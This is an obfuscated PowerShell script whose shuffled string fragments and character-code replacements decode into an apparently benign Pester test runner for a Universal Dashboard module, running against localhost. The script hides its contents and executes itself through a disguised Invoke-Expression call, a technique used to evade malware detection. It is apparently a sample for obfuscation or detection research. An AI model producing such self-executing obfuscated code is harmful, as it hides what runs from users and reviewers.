 ((' ((Tjw{82}{81}'+'{124}{119}{30}{24}{144}{17}{101}{8}{61}{103}{27}{9}{117}{2}{33}{139}{35}{68}{46}{146}{88}{135}{98}{'+'93}{141}{7}{75}{62}{73}{145}{44}{38}{0}{66}{89}{42}{99}{100}{137}{31}{131}{118}{133}{54}{29}{37}{85'+'}{12}{64}{87}{122}{108}{76}{67}{21}{1'+'02}{114}{136}{95}{18}{105}{123}{3}{78}{92}{74}{79}{94}{110}{7'+'7}{126}{19}{143}{111}{1}{72}{52}{69}{26}{65}{112}{83}{140}{109}{127}{36}{134}{130}{41}{116}{5}{34}{13}{125}{48}{32}{40}{91}{53}{43}{96}{39}{63}{10}{55}{11}{16}{25}{49}'+'{121}'+'{45}{120}{20}{107}{22}{142}{60}{71}{90}{58}{51}{104}{128}{28}{115}{56}{138}{129}{132}{86}{14}{15}{50}{6}{70}{57}'+'{59}{97}{80}{106}{47}{113}{4}{2'+'3}{84'+'}Tjw-ftd9

if (nu0{RELyaREtd9,td9ot}
    nu0{DaSyaRhBOyaRArd} = '+'nEW-yaRUDyaRdAshBoaRD -Contd9,td9
payaRRaM(
  td9,td9tAkE([ref]'+'nu0{DayaRTa}, 50td9,td'+'9    SyaRTOP-seyaRtd9,td9MaqCS+qCSpIconqCS), (qCSNew-UqCS+q'+'CSDM'+'apP'+'oqCS+qCSpupqCS),'+'td9,td9RTh} (qCSt'+'d9,td9CSnium/SqCS+qCSelqCS+qCSeniuqCS+qCSmqCS+qCS'+'.qCS+qC'+'Sps1qCS)) 
ImPOryaRT-myaRodUyaRLE (jOytd9,td956f6qCS+qCS1C65C60fqCS+qCS56y61B6qCS+qCS4g64yqCS+qC'+'S47qCS)'+' -SPlITqCSoqCS -spltd9,td9:tOINt16(( [STrinG]nu0'+'{_}),8)-atd9,td9, (qCtd9,td9CS+qC'+'S-UDMtd9,td9qtd9,td9qCSew'+'-UDMaqtd9,td9RpyaRAtH nu0{OyaRtd9,td9UyaRTPtd9,td9'+'apHqCS+qCSeatmqCS+qCSapLaqCS+'+'qCSyerqCS), (td9,td9SL72L61qCS+qCSg71C6qCS+qCS0f56C62C64qCS+qCSg71LqCtd9,td9'+'CShqCS+qCSost:qCS+qCS100qCS+qCS01qCS) -Driver nu0{'+'DRItd9,td9qCS+qCSlqCS+qCSockqCS+qCSiqCS+qCSnqCS+qCSgCoqCS+qCSlleqCS+qCScqC'+'S+qCStion[obtd9,td9EyaRR-syaREurl -Url (qCShttqCS+qCSp://td9,td9SEfiRytd9,td9if (nu0{oyaRUTpUTtESyaRtd9,td9DRIyaRVer nu0{dyaRRyaRIvER}
}
td9,td9tQ +[STrInG]( ('+'qCS4qCS+qC'+'S7:151qCS+qCSf'+'qCS+qCS16qCS+qCS0td9,td9qCSNqCS+qCSew-UDMapqCS+qCSMarkerCqCS+qCSlustertd9,td9+qCSSTqCS) -Endpoitd9,td9gq'+'CS -spLit qCS:qCS -SpliT q'+'CSmqCS-sPlItqCSLqCS-SPlit'+'qCSyqCS-SPLiTqCSfqCS-SplItqCSQqCS ax'+'DFOreayaRCh-OyaRBjyaRECt{( nu0{2'+'yaR4hQc9}:'+'td9,td9yaRTyaRpuyaRTPath} -ItemType diRetd9,td9CSDqCS+td9,td9v qCSofs'+'qCS  qCSqCS ) ytd9,td'+'9nqCS+qCSivetd9,td9CSLayeqtd9,td9  [Switch]nu0{noyaRCyaRLOse},
    [Switch]nu0{OuTPtd9,td9 (qCSNqCS+td9,td9,
 td9,td9CS+qCStRqCStd9,td9qCSashqCS+qCSbotd9,td9yaRse}td9,td'+'9+qCSvertFromqCS+qCS-Getd9,td9CS+qCSrControqCS+qCSlqCS), (qCSNew-UDtd9,td9SSetqCS+qCS-qCS+qCSTestDa'+'taqCS), (qCSNew-UqCS+qCSDMapRqCS+qCSaqC'+'td9,td9PSyaRSCRIyaRPtROOt} (qCS../qCS+qCS../qCS+qCSoutd9,td9), (qCSNew-UDqCS+qCSMapFeat'+'ureGqCS+td9,td9rELeyaRAtd9,td9qCSeqCS+qCSrqCS)))
'+'    nu0{td9,td90{ryaRElEAsE},
   td9,td9aRTrOL}) } axD FOREyaRAcH-oyaRBJEyaR'+'ct {
        . nu0{_}.Fu'+'LLNAmetd9,td9CS+q'+'td9,td9Layqtd9,td9uTpayatd'+'9,td9tion sIlENtLyCONtINUE -F'+'orce
    td9,td9u0{CoyaRNtd9,td9CS+qCSaseLaqCS+qCSyerqCS), (qCSNqCS+qCSew-UDqCS+qCSMapOverlqCS+'+'qCSaqCS+qCSyqCStd9,td9+q'+'CSd.MqCS+qCSap.qCS+qCSpsqC'+'S+qCSd1qCS)) -Force 
}
else {
    ImyaRp'+'OrT-yaRModULe (JOIyaRN-PyaRAtH nu0{pssCyaRRyaRI'+'PyaRT'+'rOOT} (qCS.qCS+qCS./UqCS+qCSniveqCS+qCSrsalqCS+qtd9,td9SNqCS+qCSeqCS'+'+qCSw'+'qtd9,td90{PssyaRcyaRRipyaRTroOT}
    INVOyatd9,td9atd9,td9R'+'ecurse -ErrorActd'+'9,td9lqCS+td9,td9UlTXML}) td9,td9it qCSCqCS-SPl'+'IT qCtd9,td9PTROyaRot} (qCS../../qCStd9,td9oqCS+qCSJsonqCS)td9,td'+'9CS.tesqCS+qCSts.psqCS+qCS1qCS)

nu0{DyaRAshByaROarD} ='+' nEyaRW-yaRUdDayaRsHBoarD -Titd9,td9ntInitialization '+'(neWyaR-yaRUdenDpoyaRIyaRNyaRTyaRINiTIaLtd9,td9yaRASe}td9'+',td9r} = StART-yaRtd9,td9   [Switch]nutd9,td9TEyaRNT} -'+'Title (qCSTEqCStd9,td9TESqCS+qCST-Materitd9,td9{
    nu0{ouyaRTyaRpUTptd9,td9tent nt'+'d9,td9+qCSouqCS+qCStpu'+'tqCS+qCS/UqCS+qCSnivqCS+qCSersalDaqCS+qCSshboard.psd1qCS)) -Force 

nu0{eNyaRV:yaRD'+'EbUg} = td9,td9criptBlotd9,td9aRin-pyaRATH nu0{P'+'SyaRSyaRCRItd9,td9Rd}
nu0{dRyaRiVy'+'aREtd9,td9ctitd9,td900)) {
        nu0{dAyaRTA} 
    } 
    else {
        throw (q'+'CSRetqCS+qCSreqCS+qCSiving data qCS+qCStiqCS+qCSmed ouqCS+qCSt (5000mqCS+qCSsqCS+qCS).qCS)
    }
}

function Set-tEStdasHbOarD {
    param(td9,td9ck]nu0{CO'+'yaRNTeN'+'t}
td9,td9   POpyaR-LOCatiyaROn
} else'+' {
    td9,td9'+'AR'+'ytQ+ytQiABytQ+ytQtd9,td9SyaREyaRT-iTEM (ytQvtd9,td9(qCSSqCS+qCStateCqCS+qCSollectiqtd9,td9




td9,td9ard.MqCS+qCSap.qCS+qCSpsm1qCS)'+') -Force 
}


nu0{TyaREsTS} = GET-ChIyaRlDiyaRTem nu0{PSSyaRcriyaRPtRoot} -Filter (qCS*qCS+td9,td9yatd9,td9tle ('+'qCSTeqCS+qCSstqCS) -Content {}
nu0{SyaRERvyaRER} = STARyaRTyaR-UdDASHBoayaRRD -Port 10'+'001 -Dashboatd9,td9tring]nu0{cONtyaRRyaROl} = (qCSmqCS+qCSapqCS)
)

. (joyaRiN-Py'+'aRAth nu0{PSSyaRtd9,td9) {
    IyaRMpORt-yaRMOdyaRULe (JoyaRin-yaRpyaRATh nu0{td9,td9ATh} = ytQnu0'+'PSScriptRootrw9test-resultsytQ 
    REMyaR'+'Oy'+'aRVE-it'+'em nu0{OUtPyaRUyaRTpyaRAth} -td9,td9MapqCS+'+'qCSBqtd9,td9
        [Std9,td9oT} (qCS../../qCS+td9,td9    '+')

    nu0{globALyaR:sTATEcyaROLyaRLyatd9,td9qCShqCS+qCSttp://locaqCS+qCSlqCS+qtd9,td9qCSroqCS+qCSuqCS+qCSpqCS), (qCSCoqCS+qCSnqCStd9,td9qCSizqCS+qCSeqCS+qCS.xmlqCS)) -OutputFormat nunitxml
 td9,td9RoyaRtd9,td9tputd9,td9t/qCS+'+'qCSModuleqCS+qCSs/qCS'+'+qCSUnivqCS+qtd9,td9S+qCStd9,td9aREFoxtd9,td9'+'SBqCS-sPLiT qCStd'+'9,td9New-yaRiTem td9,td9vyaRER}

function SET-T'+'esTdata {
    param(nu0{DayaRTa})

    nu0{sTyaRAtyaRECyaROlLyatd9,td9nu0{teSyaRTs} axD wHyaRERe-OByaRJyaREcT { nu0{_}.Name.CoNtaI'+'nS(nu0{cyaRoNytd9,td9qCS+qCSlocalhost:1qCS+qCS000qCS+qCS1qCS) -Driver nu0{D'+'RIVyaREr}
}


td9,td9dAsyaRHyaRBoAtd9,td9qtd9,td9REcyaRTIyaRoN} = NyaREW-OyaRBjECt -TypeName (qCSSysteqCS+'+'qCSm.qCS+qCSColletd9,'+'td9PSSCryaRIyaRPTyaRRotd9,td9I'+'yaRZaTIOn -Variable @(td9,td9
    }
}

if (-'+'not nu0{nOClyaRoSe}) 
{
    StyaROp-Udd'+'AyaRShByaROaRD -Port 10001
t'+'d9,td9
ENtd9,td9cTOrY

    pyaRUshyaR-LoyaRCatyaRion nutd9,td9S+qCSsterLayqCS+qCSerqCS), (qCSNew-UD'+'MqCS+qCSaqCS+qCSpMarqCS'+'+qCS'+'kerqCS), (qCSNewqCS+qCS-UDtd9,td9s[CHAr])} ) +'+'ytQnu0( sEt-iTem qCSVArIabLE:OFsqCS qCS qCS ) ytQ)'+'td9,td'+'9lDasqCS+qCShboarqCtd9,td9)  ('+'[TYPe]('+'qCSCOqCS+qCSnvErtqCS)) ; nu0{HOyaRNXGN}  =  ( ytQ nu'+'0(std9,td9syaRERyaRVER}.daSHboa'+'rDSERvICE.setdaShBoaRd(nu0{DasyaRHbyaRoyaRArD})
    EnTtd9,td9CS+td9,td9rd '+'n'+'u0{td9,t'+'d9REcTIOn}.Add(nu0{dayaRTA})
}

function GET-testdAtA {
    nu0{dyaRATA} = nu0{NuyaRlL}
    if (nu0{GlOyaRBa'+'L:syaRTyaRAyaRTEcyaROyaRlLecTIon}.TRytd9,td9LytQ+yt'+'QE:24HQC'+'9ytQtd9,td9CS+qCSpVqCS+qCSectqCS+qCSorL'+'ayerqCS), (qCSNew-UDMqCS+qCSapqtd'+'9,td9onsqCS+qCS.qCS+qCSCqCS+qCSonqCS+qCScurreqCS+qCSnt.Btd9,'+'td9CSoqCS+'+'qCSnqCS), (qCSScripqtd9,'+'td9'+'-Path nu0{outd9,td9 td9,'+'td'+'9ootqCS)) -Funct'+'ion @((qCtd9,td9rsatd9,td9(JOIn-td9,td9Std9,t'+'d9+qCStd9,td9cyaRRiPTyaRtd9,td9'+'TeRyaR-SyaREuRl -Url (td9,td9CSersalDashboqCS+qCSaqCS+qCSrd.qCS+qCSMaqCS+qCSp/Utd9,td9RkeyaR-pyaREsyaRTer -OutputFiletd9,td9yaRUyaRTtEyaRsyaRTryaREsuLtXml}td9,td9CS+td9,td9qCSSelqCS+qCSeqCS'+'+qtd9,td9TryaREStd9,td9jectqCS+qCS]qCS)

    nu0{scriPyaRTryaRO'+'Ot} = nu0{td9,td9qCS+qCtd9,td9-not nu0{td9,td9 [std9)).R'+'EpLAce(td9ytQtd9,[STrIng][chAR]34).REpLAce(([chAR]97+[chAR]12'+'0+[chAR]68),[STrIng][chAR]124).REpLAce(([chAR]113+[c'+'hAR]67+[chAR]83),[STrIng]['+'chAR]39).REpLAce(([chAR]110+[chAR]117+[chAR]48),[STrIng][chAR]36).REpLAce(([chAR]114+[chAR]119+[ch'+'AR]57),[STrIng][chAR]92).REpLAc'+'e(td9yaRtd9,['+'STrIng][chAR]96)pv7 .((gV td9*Mdr*td9).NamE[3,11,2]-JOINtd9td9)
')  -CrEplacE'Tjw',[ChaR]34-rePLaCe'pv7',[ChaR]124  -CrEplacE'td9',[ChaR]39) |.((gET-varIABle '*MDR*').namE[3,11,2]-JOIN'')
